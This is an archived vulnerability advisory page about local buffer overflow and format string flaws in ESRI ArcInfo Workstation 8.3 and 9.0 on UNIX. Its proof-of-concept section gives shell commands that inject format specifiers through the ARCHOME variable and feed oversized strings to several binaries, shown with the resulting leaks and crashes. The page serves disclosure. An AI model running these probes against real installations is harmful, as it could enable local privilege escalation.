exploits , vulnerabilities , articles , ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities

Title	ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
Published	2005-04-30-12:00AM
Updated	2005-05-24-02:45PM
Class	Unknown
CVE	CAN-2005-1393 CAN-2005-1394
Remote	No
Local	Yes
Credit	Discovery is credited to Kevin Finisterre.
Vulnerable	ESRI ArcInfo Workstation on UNIX 9.0 ESRI ArcInfo Workstation on UNIX 8.3
Not Vulnerable
Code	The following proof-of-concept examples were provided: -bash-2.05b$ export ARCHOME=AAAABBBB%x.%x.%x.%x -bash-2.05b$ ./wservice Can not find or access AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run! -bash-2.05b# export ARCHOME=%x.%x.%x.%x -bash-2.05b# ./lockmgr Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run! -bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b FATAL ERROR Segment Violation -bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a FATAL ERROR Segment Violation -bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x 804'` FATAL ERROR Segment Violation -bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'` FATAL ERROR Segment Violation -bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a FATAL ERROR Segment Violation Exploit code was also released for the 'wservice' format string vulnrability. /data/vulnerabilities/exploits/ex_arcgis.c
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
• 2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
• 2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
• 2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
• 2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
• 2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
• 2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
• 2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
• 2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
• 2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 16:56:51 +0000